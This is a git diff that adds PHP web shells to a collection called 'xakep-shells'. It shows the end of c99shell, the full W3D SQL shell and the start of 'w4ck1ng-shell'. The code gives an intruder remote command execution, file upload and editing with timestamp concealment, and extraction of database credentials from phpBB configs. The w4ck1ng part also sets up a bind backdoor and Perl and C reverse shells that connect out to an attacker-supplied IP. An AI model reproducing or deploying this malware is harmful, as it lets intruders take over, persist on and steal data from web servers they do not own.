+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+   if (!$win)
+   {
+    echo "<tr><td><b>Owner/Group</b></td><td> ";    
+    $ow = posix_getpwuid(fileowner($d.$f));
+    $gr = posix_getgrgid(filegroup($d.$f));
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+   }
+   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
+   $fi = fopen($d.$f,"rb");
+   if ($fi)
+   {
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
+    $n = 0;
+    $a0 = "00000000<br>";
+    $a1 = "";
+    $a2 = "";
+    for ($i=0; $i<strlen($str); $i++)
+    {
+     $a1 .= sprintf("%02X",ord($str[$i]))." ";
+     switch (ord($str[$i]))
+     {
+      case 0:  $a2 .= "<font>0</font>"; break;
+      case 32:
+      case 10:
+      case 13: $a2 .= "&nbsp;"; break;
+      default: $a2 .= htmlspecialchars($str[$i]);
+     }
+     $n++;
+     if ($n == $hexdump_rows)
+     {
+      $n = 0;
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
+      $a1 .= "<br>";
+      $a2 .= "<br>";
+     }
+    }
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
+   }
+   $encoded = "";
+   if ($base64 == 1)
+   {
+    echo "<b>Base64 Encode</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+   }
+   elseif($base64 == 2)
+   {
+    echo "<b>Base64 Encode + Chunk</b><br>";
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
+   }
+   elseif($base64 == 3)
+   {
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+   }
+   elseif($base64 == 4)
+   {
+    $text = file_get_contents($d.$f);
+    $encoded = base64_decode($text);
+    echo "<b>Base64 Decode";
+    if (base64_encode($encoded) != $text) {echo " (failed)";}
+    echo "</b><br>";
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+<P>";
+  }
+  elseif ($ft == "html")
+  {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {c99shexit();}
+  }
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
+  elseif ($ft == "phpsess")
+  {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe")
+  {
+   $ext = explode(".",$f);
+   $c = count($ext)-1;
+   $ext = $ext[$c];
+   $ext = strtolower($ext);
+   $rft = "";
+   foreach($exeftypes as $k=>$v)
+   {
+    if (in_array($ext,$v)) {$rft = $k; break;}
+   }
+   $cmd = str_replace("%f%",$f,$rft);
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
+  }
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
+  elseif ($ft == "code")
+  {
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
+   {
+    $arr = explode("\n",$r);
+    if (count($arr == 18))
+    {
+     include($d.$f);
+     echo "<b>phpBB configuration is detected in this file!<br>";
+     if ($dbms == "mysql4") {$dbms = "mysql";}
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";}
+     echo "Parameters for manual connect:<br>";
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+     echo "</b><hr size=\"1\" noshade>";
+    }
+   }
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+   if (!empty($white)) {@ob_clean();}
+   highlight_file($d.$f);
+   if (!empty($white)) {c99shexit();}
+   echo "</div>";
+  }
+  elseif ($ft == "download")
+  {
+   @ob_clean();
+   header("Content-type: application/octet-stream");
+   header("Content-length: ".filesize($d.$f));
+   header("Content-disposition: attachment; filename=\"".$f."\";");
+   echo $r;
+   exit;
+  }
+  elseif ($ft == "notepad")
+  {
+   @ob_clean();
+   header("Content-type: text/plain");
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+   echo($r);
+   exit;
+  }
+  elseif ($ft == "img")
+  {
+   $inf = getimagesize($d.$f);
+   if (!$white)
+   {
+    if (empty($imgsize)) {$imgsize = 20;}
+    $width = $inf[0]/100*$imgsize;
+    $height = $inf[1]/100*$imgsize;
+    echo "<center><b>Size:</b>&nbsp;";
+    $sizes = array("100","50","20");
+    foreach ($sizes as $v)
+    {
+     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
+     if ($imgsize != $v ) {echo $v;}
+     else {echo "<u>".$v."</u>";}
+     echo "</a>&nbsp;&nbsp;&nbsp;";
+    }
+    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
+   }
+   else
+   {
+    @ob_clean();
+    $ext = explode($f,".");
+    $ext = $ext[count($ext)-1];
+    header("Content-type: ".$inf["mime"]);
+    readfile($d.$f);
+    exit;
+   }
+  }
+  elseif ($ft == "edit")
+  {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$edit_text);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $edit_text;
+    }
+   }
+   $rows = count(explode("\r\n",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+ }
+}
+}
+else
+{
+ @ob_clean();
+ //For simple size- and speed-optimization.
+ $imgequals = array(
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
+  "ext_html"=>array("ext_html","ext_htm"),
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
+  "ext_lnk"=>array("ext_lnk","ext_url"),
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
+  "ext_doc"=>array("ext_doc","ext_dot"),
+  "ext_js"=>array("ext_js","ext_vbs"),
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
+  "ext_wri"=>array("ext_wri","ext_rtf"),
+  "ext_swf"=>array("ext_swf","ext_fla"),
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
+ );
+ if (!$getall)
+ {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
+  if (empty($images[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($images[$img]);
+ }
+ else
+ {
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
+  natsort($images);
+  $k = array_keys($images);
+  echo  "<center>";
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
+  echo "</center>";
+ }
+ exit;
+}
+if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\">icq</a>.</b>";}
+?>
+</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Command execute</b></a> ::</b></p></td></tr>
+<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE>
+<br>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+ <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=search&d=<?php echo urlencode($d); ?>"><b>Search</b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td>
+ <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=upload&d=<?php echo $ud; ?>"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td>
+</tr>
+</table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>powered by</b></u></a> Captain Crunch Security Team | <a href="http://ccteam.ru"><font color="#FF0000">http://ccteam.ru</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table>
+</body></html><?php chdir($lastdir); c99shexit(); ?>
+
diff --git a/xakep-shells/PHP/w3d.php.php.txt b/xakep-shells/PHP/w3d.php.php.txt
new file mode 100644
index 0000000..f9d2213
--- /dev/null
+++ b/xakep-shells/PHP/w3d.php.php.txt
@@ -0,0 +1,128 @@
+<?php
+/*
+W3D Shell
+By: Warpboy
+www.private-node.net
+Version: 0x01
+Info: Created specifically for straight-foreward SQL interaction.
+Planned updates: More features, easier interaction with database(s)
+*/
+
+//Store User Input
+$user = $_POST['user'];
+$pass = $_POST['pass'];
+$dbn = $_POST['db'];
+$host = "localhost";
+
+//Comprehend Change
+if($_REQUEST['change']) {
+setcookie("user", "$user", time()+3600);
+setcookie("pass", "$pass", time()+3600);
+setcookie("db", "$dbn", time()+3600);
+}
+//Define cookies in vars
+$username = $_COOKIE["user"];
+$password = $_COOKIE["pass"];
+$database = $_COOKIE["db"];
+
+//build header
+echo '<title>W3D Shell // By: Warpboy \\\ SQL Shell</title>';
+echo '
+<font color=#00CC00><body bgcolor=black>
+<center><table border=0 cellpadding=0 cellspacing=0 width=50% style=font-size: 14px; font-family: Arial;>
+<tr><td bgcolor=#00CC00><center><font size="3" face="Verdana"><b>W3D SQL Shell</font></tr></td>
+<tr><td><font color=#FFFFFF><center><b><font size="1" face="Georgia"><marquee speed=1>By: Warpboy</td></font></tr>
+';
+echo '
+<tr><td><font color=#00CC00><center><b><br>[]Database Info[]</td></tr><tr><td><font color=#FFFFFF><b><pre><br>
+<center>
+<form action="w3d.php" method="post">
+Username: <input type="text" name="user" </input>
+Password: <input type="text" name="pass" />
+Database: <input type="text" name="db" />
+<input type="submit" value="Change" name="change"  />
+</form>    </tr></td><table>
+';
+echo '
+<form action="w3d.php" method="get">
+<b><font color=#00CC00><br>Query:</font></b> <input type="text" name="query" size="65"/>
+<input type="submit"  />
+</form>';
+
+//Initial pre-cookie
+$con = @mysql_connect($host, $user, $pass);
+if (!$con){
+ //secondary post-cookie
+ $con1 = @mysql_connect($host, $username, $password);
+ if(!$con1) {
+ echo "<br><b><font color=#00CC00>Currently not connected.<br>";
+ }
+ }
+
+//Notify user of current connection
+if($_REQUEST['change'] && $user != '') {
+echo "<br><b><font color=#00CC00>Connected to MySQL as user</font>" . "<font color=red> $user</b></font>";
+}
+if(!$_REQUEST['change'] && $username != '') {
+echo "<br><b><font color=#00CC00>Connected to MySQL as user</font>" . "<font color=red> $username</b></font>";
+}
+
+//Database Time
+//initial pre-cookie
+$db_c = @mysql_select_db($dbn,$con);
+if(!$db_c) {
+//secondary post-cookie
+$db_d = @mysql_select_db($database,$con1);
+if(!$db_d) {
+if(isset($database) || isset($dbn)) {
+echo "<br><font color=#00CC00><b>Unable to access database!";
+}
+}
+}
+//query function
+query();
+
+function query() {
+$query = $_GET['query'];
+if($query == '') {
+echo "<br><font color=#00CC00><b>No Query Executed</b></font>";
+}
+else {
+//Query Time
+$query1 = str_replace("\\", " ", $query);
+$result = @mysql_query("$query1");
+echo "<br><b><font color=#00CC00>Query Results: <br /></b></font> ";
+        echo "<table border=1 cellpadding=0 cellspacing=0 width=100% style=\"font-size: 14px; font-family: Trebuchet;\">
+                <tr bgcolor=white align=center style=\"font-weight: bold;\">\n";
+
+$rr = @mysql_num_fields($result);
+                for($kz=0; $kz<$rr; $kz++)
+                {
+                        $ee = @mysql_field_name($result,$kz);
+                        echo "<td bgcolor=#FFFFFF>$ee</td>";
+                }
+                echo "</tr>\n";
+
+                $vv = true;
+                while ($line = @mysql_fetch_array($result, MYSQL_ASSOC)) {
+                        if($vv === true){
+                        echo "<tr align=center bgcolor=#00CC00>\n";
+                        $vv = false;
+                        }
+                        else{
+                        echo "<tr align=center bgcolor=#00CC00>\n";
+                        $vv = true;
+                        }
+                        foreach ($line as $col_value) {
+                echo "<td>$col_value</td>\n";
+                        }
+                echo "</tr>\n";
+                }
+                echo "</table>\n";
+
+                @mysql_free_result($result);
+
+}
+}
+
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/w4k.php.php.txt b/xakep-shells/PHP/w4k.php.php.txt
new file mode 100644
index 0000000..d870490
--- /dev/null
+++ b/xakep-shells/PHP/w4k.php.php.txt
@@ -0,0 +1,2830 @@
+<?php
+if (!function_exists("myshellexec"))
+{
+if(is_callable("popen")){
+function myshellexec($command) {
+if (!($p=popen("($command)2>&1","r"))) {
+return 126;
+}
+while (!feof($p)) {
+$line=fgets($p,1000);
+$out .= $line;
+}
+pclose($p);
+return $out;
+}
+}else{
+function myshellexec($cmd)
+{
+ global $disablefunc;
+ $result = "";
+ if (!empty($cmd))
+ {
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+  elseif (($result = `$cmd`) !== FALSE) {}
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_resource($fp = popen($cmd,"r")))
+  {
+   $result = "";
+   while(!feof($fp)) {$result .= fread($fp,1024);}
+   pclose($fp);
+  }
+ }
+ return $result;
+}
+}
+}
+
+
+function checkproxyhost(){
+$host = getenv("HTTP_HOST");
+$filename = '/tmp/.setan/xh';
+if (file_exists($filename)) {
+$_POST['proxyhostmsg']="</br></br><center><font color=green size=3><b>Success!</b></font></br></br><a href=$host:6543>$host:6543</a></br></br><b>Note:</b> If '$host' have a good firewall or IDS  installed on their server, it will probably catch this or stop it from ever opening a port and you won't be able to connect to this proxy.</br></br></center>";
+} else {
+$_POST['proxyhostmsg']="</br></br><center><font color=red size=3><b>Failed!</b></font></br></br><b>Note:</b> If for some reason we would not create and extract the need proxy files in '/tmp' this will make this fail.</br></br></center>";
+ } 
+}
+
+if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd"))
+{ 
+ $ip = gethostbyname($_SERVER["HTTP_HOST"]);
+ $por = $_POST['backconnectport'];
+ if(is_writable(".")){
+ cfb("shbd",$backdoor);
+ ex("chmod 777 shbd");
+ $cmd = "./shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux"); 
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+ }else{
+ cfb("/tmp/shbd",$backdoor);
+ ex("chmod 777 /tmp/shbd");
+ $cmd = "./tmp/shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux"); 
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+}
+} 
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl"))
+{
+ if(is_writable(".")){
+ cf("back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ if (file_exists("back")) { unlink("back"); }
+ }else{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ if (file_exists("/tmp/back")) { unlink("/tmp/back"); }
+}
+} 
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C"))
+{
+ if(is_writable(".")){
+ cf("backc",$back_connect_c);
+ ex("chmod 777 backc");
+ //$blah = ex("gcc back.c -o backc");
+ $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ //if (file_exists("back.c")) { unlink("back.c"); }
+ if (file_exists("backc")) { unlink("backc"); }
+ }else{
+ ex("chmod 777 /tmp/backc");
+ cf("/tmp/backc",$back_connect_c);
+ //$blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ //if (file_exists("back.c")) { unlink("back.c"); }
+ if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); } }
+}
+
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or err();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function cfb($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or bberr();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function err()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't connect!</b>";
+}
+
+function bberr()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>";
+}
+
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+
+ini_set("memory_limit","300M");
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+if (!function_exists("file_get_contents")) { function file_get_contents($filename){ $handle = fopen($filename, "r"); $retval = fread($handle, filesize($filename)); fclose($handle);return $retval;}}
+error_reporting(5);
+@ignore_user_abort(TRUE);
+@set_magic_quotes_runtime(0);
+$win = strtolower(substr(PHP_OS,0,3)) == "win";
+define("starttime",getmicrotime());
+//removed backdoor
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
+$shver = "w4ck1ng-shell (Private Build v0.3)"; 
+if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
+else {$surl = $_REQUEST["c99sh_surl"]; 
+}
+$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
+if (empty($surl))
+{
+ $surl = "?".$includestr; 
+}
+$surl = htmlspecialchars($surl);
+$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
+$login = ""; 
+$pass = ""; 
+$md5_pass = "";
+$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
+$login_txt = "Apache Error: Restricted File";
+$accessdeniedmess = "access denied";
+$gzipencode = TRUE; 
+$filestealth = TRUE; //if TRUE, don't change modify- and access-time
+$donated_html = "";
+$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
+$curdir = "./"; 
+//$curdir = getenv("DOCUMENT_ROOT");
+$tmpdir = ""; 
+$tmpdir_log = "./"; 
+//$log_email = "synsta@gmail.com"; 
+$sort_default = "0a"; 
+$sort_save = TRUE;
+$ftypes  = array(
